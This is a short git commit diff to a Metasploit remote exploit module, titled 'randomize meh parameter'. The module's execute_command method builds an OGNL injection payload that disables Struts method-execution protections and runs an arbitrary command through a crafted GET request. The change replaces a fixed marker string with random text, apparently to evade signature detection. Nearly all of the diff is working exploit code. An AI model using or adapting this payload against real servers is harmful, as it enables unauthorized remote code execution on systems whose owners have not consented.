randomize meh parameter
parent
a3fff5401f
commit
53fde675e7
|
@ -78,14 +78,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def execute_command(cmd)
|
def execute_command(cmd)
|
||||||
|
junk = Rex::Text.rand_text_alpha(6)
|
||||||
inject = "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
|
inject = "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
|
||||||
inject << "= new java.lang.Boolean(true),#{cmd})('meh')"
|
inject << "= new java.lang.Boolean(true),#{cmd})('#{junk}')"
|
||||||
uri = normalize_uri(datastore['TARGETURI'])
|
uri = normalize_uri(datastore['TARGETURI'])
|
||||||
resp = send_request_cgi({
|
resp = send_request_cgi({
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
'version' => '1.1',
|
'version' => '1.1',
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'vars_get' => { parameter => inject, "z[(#{parameter})(meh)]" => 'true' }
|
'vars_get' => { parameter => inject, "z[(#{parameter})(#{junk})]" => 'true' }
|
||||||
})
|
})
|
||||||
resp
|
resp
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue